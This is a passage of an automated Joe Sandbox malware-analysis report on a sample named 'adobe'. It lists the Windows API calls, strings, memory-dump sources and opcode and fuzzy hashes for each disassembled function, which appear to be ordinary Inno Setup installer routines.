                                                                                                                                                          • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                                                                                          • API String ID: 1951258720-508647305
                                                                                                                                                          • Opcode ID: 29080689e44d0f35022647b33967859d98a6fde3a256b76c87c92fdbaa8d7a9c
                                                                                                                                                          • Instruction ID: f30e091031291b2f12efd1c24b35210b9374578792016564e11b1fa4c6f216ed
                                                                                                                                                          • Opcode Fuzzy Hash: 29080689e44d0f35022647b33967859d98a6fde3a256b76c87c92fdbaa8d7a9c
                                                                                                                                                          • Instruction Fuzzy Hash: C3F049B0A01700CEDB14DF76BEC633B3A95D7A8312F18803BA519A51A2E738084CCA5C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,004968AA,?,?,00000000,0049A628,?,00496A34,00000000,00496A88,?,?,00000000,0049A628), ref: 004967C3
                                                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00496846
                                                                                                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00496882,?,00000000,?,00000000,004968AA,?,?,00000000,0049A628,?,00496A34,00000000), ref: 0049685E
                                                                                                                                                          • FindClose.KERNEL32(000000FF,00496889,00496882,?,00000000,?,00000000,004968AA,?,?,00000000,0049A628,?,00496A34,00000000,00496A88), ref: 0049687C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileFind$AttributesCloseFirstNext
                                                                                                                                                          • String ID: isRS-$isRS-???.tmp
                                                                                                                                                          • API String ID: 134685335-3422211394
                                                                                                                                                          • Opcode ID: 1cf8e9bc9b3c20357937420cd326a99100db9ac98f37d329e20eb371d892ce32
                                                                                                                                                          • Instruction ID: 4c3790275d38ca103fc9de384e2170f2b3829de03e7269e11a2e0ee89d27f860
                                                                                                                                                          • Opcode Fuzzy Hash: 1cf8e9bc9b3c20357937420cd326a99100db9ac98f37d329e20eb371d892ce32
                                                                                                                                                          • Instruction Fuzzy Hash: C331A671901618AFDF10FF65CC41ACEBBBCDB45304F5184FBA808A32A1E6389F458E58
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryA.KERNEL32(oleacc.dll,?,0044E8DD), ref: 0044C03F
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C050
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C060
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                          • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                                                                                          • API String ID: 2238633743-1050967733
                                                                                                                                                          • Opcode ID: 0de9e05f27749137ffab1fe308f9190fc83f01827653125ce4f3cced318db0ec
                                                                                                                                                          • Instruction ID: 768994a2e6e1f30713717b1c29876c1fd16d3b2562f205e666220538aba0b6e7
                                                                                                                                                          • Opcode Fuzzy Hash: 0de9e05f27749137ffab1fe308f9190fc83f01827653125ce4f3cced318db0ec
                                                                                                                                                          • Instruction Fuzzy Hash: BBF01CB0242701CAFB609FF5ECC672632B4E364708F18557BA0016A2E2C7BD9494CF5E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456909
                                                                                                                                                          • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456930
                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 00456941
                                                                                                                                                          • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00456C19,?,00000000,00456C55), ref: 00456C04
                                                                                                                                                          Strings
                                                                                                                                                          • Cannot evaluate variable because [Code] isn't running yet, xrefs: 00456A84
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                                                                                          • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                                                                                          • API String ID: 2236967946-3182603685
                                                                                                                                                          • Opcode ID: 2ad0bef8c84949f14e5e2d5e65e103814edb4cbdf20235d422bc76e1971a723a
                                                                                                                                                          • Instruction ID: 10654f18c5d002830b012396f94dace0bb6b4eb939fefcd194574106bfd79093
                                                                                                                                                          • Opcode Fuzzy Hash: 2ad0bef8c84949f14e5e2d5e65e103814edb4cbdf20235d422bc76e1971a723a
                                                                                                                                                          • Instruction Fuzzy Hash: 6791FE74204204EFD716CF55C961F5ABBF9FB89305F6280BAEC0497392C639AE14CB59
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455477), ref: 00455368
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045536E
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExA$kernel32.dll
• API String ID: 1646373207-3712701948
• Opcode ID: cc7745dbfee59e8a39e4717e3973c749d4d024fdb8d5261c409c68ffe2c4b2d5
• Instruction ID: dabfbf279b89037e1462e9a882b6d795e79896abcd5759e9fca5673e80196c90
• Opcode Fuzzy Hash: cc7745dbfee59e8a39e4717e3973c749d4d024fdb8d5261c409c68ffe2c4b2d5
• Instruction Fuzzy Hash: 69419371A00649AFCF01EFA5C892AEFB7B8EF49305F508566F804F7252D67C5D098B68
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsIconic.USER32(?), ref: 00417D1F
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
• GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
• SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Window$Placement$Iconic
• String ID: ,
• API String ID: 568898626-3772416878
• Opcode ID: ee8a28a784f717aad114cf7761ff202b5f9973c8693922c7421ed2f673d62dc0
• Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
• Opcode Fuzzy Hash: ee8a28a784f717aad114cf7761ff202b5f9973c8693922c7421ed2f673d62dc0
• Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(00000001,00000000,004636C1), ref: 00463535
• FindFirstFileA.KERNEL32(00000000,?,00000000,00463694,?,00000001,00000000,004636C1), ref: 004635C4
• FindNextFileA.KERNEL32(000000FF,?,00000000,00463676,?,00000000,?,00000000,00463694,?,00000001,00000000,004636C1), ref: 00463656
• FindClose.KERNEL32(000000FF,0046367D,00463676,?,00000000,?,00000000,00463694,?,00000001,00000000,004636C1), ref: 00463670
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Find$File$CloseErrorFirstModeNext
• String ID:
• API String ID: 4011626565-0
• Opcode ID: dbca08b9d693e00e2d4e1ffad56bca2e22960ad918938c86d8af07611c6483b8
• Instruction ID: b0d7957544a47795154538d81e468f7c6c920a748ffd929e2f02ef98002ad070
• Opcode Fuzzy Hash: dbca08b9d693e00e2d4e1ffad56bca2e22960ad918938c86d8af07611c6483b8
• Instruction Fuzzy Hash: BF418770A00A58AFCB11EF65CC55ADEB7B8EB48709F4044BAF404A7391E77C9F448E59
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(00000001,00000000,00463B67), ref: 004639F5
• FindFirstFileA.KERNEL32(00000000,?,00000000,00463B32,?,00000001,00000000,00463B67), ref: 00463A3B
• FindNextFileA.KERNEL32(000000FF,?,00000000,00463B14,?,00000000,?,00000000,00463B32,?,00000001,00000000,00463B67), ref: 00463AF0
• FindClose.KERNEL32(000000FF,00463B1B,00463B14,?,00000000,?,00000000,00463B32,?,00000001,00000000,00463B67), ref: 00463B0E
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Find$File$CloseErrorFirstModeNext
• String ID:
• API String ID: 4011626565-0
• Opcode ID: 28f9e3410985afb90aea182210dc45069b30c1a9ca39f4816f6627e3126ba2d6
• Instruction ID: 97f58be689a7aad7613f851e0c4409f020999d87f0ba5e9b9459bb80848a8bb9
• Opcode Fuzzy Hash: 28f9e3410985afb90aea182210dc45069b30c1a9ca39f4816f6627e3126ba2d6
• Instruction Fuzzy Hash: 26417034A00658DBCB10EFA5DC859DEB7B8EB88305F4045AAF804A7341EB789F458E59
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004525AF,00000000,004525D0), ref: 0042E7CA
• DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E7F5
• GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004525AF,00000000,004525D0), ref: 0042E802
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004525AF,00000000,004525D0), ref: 0042E80A
• SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,004525AF,00000000,004525D0), ref: 0042E810
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: ErrorLast$CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 1177325624-0
• Opcode ID: 07608c2f518a79a4d4257b84a8e9f7bc3bbf9e1cf85a77bbc9dfec21d4af983b
• Instruction ID: 97181128065a238999caafd211b152b701c4b4b5d95cf39bc3f304bf3469fa68
• Opcode Fuzzy Hash: 07608c2f518a79a4d4257b84a8e9f7bc3bbf9e1cf85a77bbc9dfec21d4af983b
• Instruction Fuzzy Hash: 4FF0F0713917203AF620B17A6C82F7B018CCB85F68F10823ABB04FF1C1D9A84C06066D
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsIconic.USER32(?), ref: 00481EF2
• GetWindowLongA.USER32(00000000,000000F0), ref: 00481F10
• ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049B050,004815EE,00481622,00000000,00481642,?,?,00000001,0049B050), ref: 00481F32
• ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049B050,004815EE,00481622,00000000,00481642,?,?,00000001,0049B050), ref: 00481F46
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Window$Show$IconicLong
• String ID:
• API String ID: 2754861897-0
• Opcode ID: d1685bcdcd38db79443942f5787a6c940ff35178bdeaf12f7d811a120f7588a3
• Instruction ID: a151493f8bb258e154686fc306989cafdf15b2fa5ae2d2c6c79316c3cae0d13f
• Opcode Fuzzy Hash: d1685bcdcd38db79443942f5787a6c940ff35178bdeaf12f7d811a120f7588a3
• Instruction Fuzzy Hash: C20171702442059AD710F72A9D45B6F239CAB12308F0808BBBE519B6B3DB6D9C56974C
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,0046204C), ref: 00461FD0
                                                                                                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0046202C,?,00000000,?,00000000,0046204C), ref: 0046200C
                                                                                                                                                          • FindClose.KERNEL32(000000FF,00462033,0046202C,?,00000000,?,00000000,0046204C), ref: 00462026
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3541575487-0
                                                                                                                                                          • Opcode ID: ca4ce0d84dbd4ca56c3731b72821d8e08087772405383aaed1bec0098e4b73c7
                                                                                                                                                          • Instruction ID: 501593defdbab8929c71f5630084487ab8f477331e3ec7d708c0d9d753d3c012
                                                                                                                                                          • Opcode Fuzzy Hash: ca4ce0d84dbd4ca56c3731b72821d8e08087772405383aaed1bec0098e4b73c7
                                                                                                                                                          • Instruction Fuzzy Hash: C121A831904B08BEDB11EF65CC41ADEBBBCDB49704F5084B7B908E21A1E67C9E45CA5A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • IsIconic.USER32(?), ref: 004241F4
                                                                                                                                                          • SetActiveWindow.USER32(?,?,?,0046BECB), ref: 00424201
                                                                                                                                                            • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                                                                                            • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,023325AC,0042421A,?,?,?,0046BECB), ref: 00423B5F
                                                                                                                                                          • SetFocus.USER32(00000000,?,?,?,0046BECB), ref: 0042422E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ActiveFocusIconicShow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 649377781-0
                                                                                                                                                          • Opcode ID: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
                                                                                                                                                          • Instruction ID: b114ffa8fbe078055c417a305beb0b6e8983b6333d82b3c601511fe05fbe2975
                                                                                                                                                          • Opcode Fuzzy Hash: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
                                                                                                                                                          • Instruction Fuzzy Hash: 07F03A717001208BCB10EFAA98C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • IsIconic.USER32(?), ref: 00417D1F
                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                                                                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                                                                                                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$Placement$Iconic
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 568898626-0
                                                                                                                                                          • Opcode ID: 27cd6f1a1aab1ceb2c02a4b71596b5ee0c1af9df45b06411c7b3ae1ae91b0d5e
                                                                                                                                                          • Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
                                                                                                                                                          • Opcode Fuzzy Hash: 27cd6f1a1aab1ceb2c02a4b71596b5ee0c1af9df45b06411c7b3ae1ae91b0d5e
                                                                                                                                                          • Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CaptureIconic
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2277910766-0
                                                                                                                                                          • Opcode ID: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
                                                                                                                                                          • Instruction ID: 1c917faadd476c588bdf1ff4a00e1594475ac94e71cf422183988d33397b9b13
                                                                                                                                                          • Opcode Fuzzy Hash: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
                                                                                                                                                          • Instruction Fuzzy Hash: 85F04F32304A028BDB21A72EC885AEB62F59F84368B14443FE415CB765EB7CDCD58758
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • IsIconic.USER32(?), ref: 004241AB
                                                                                                                                                            • Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                                                                                                            • Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                                                                                                            • Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                                                                                                            • Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                                                                                                          • SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF
                                                                                                                                                            • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2671590913-0
                                                                                                                                                          • Opcode ID: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
                                                                                                                                                          • Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
                                                                                                                                                          • Opcode Fuzzy Hash: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
                                                                                                                                                          • Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
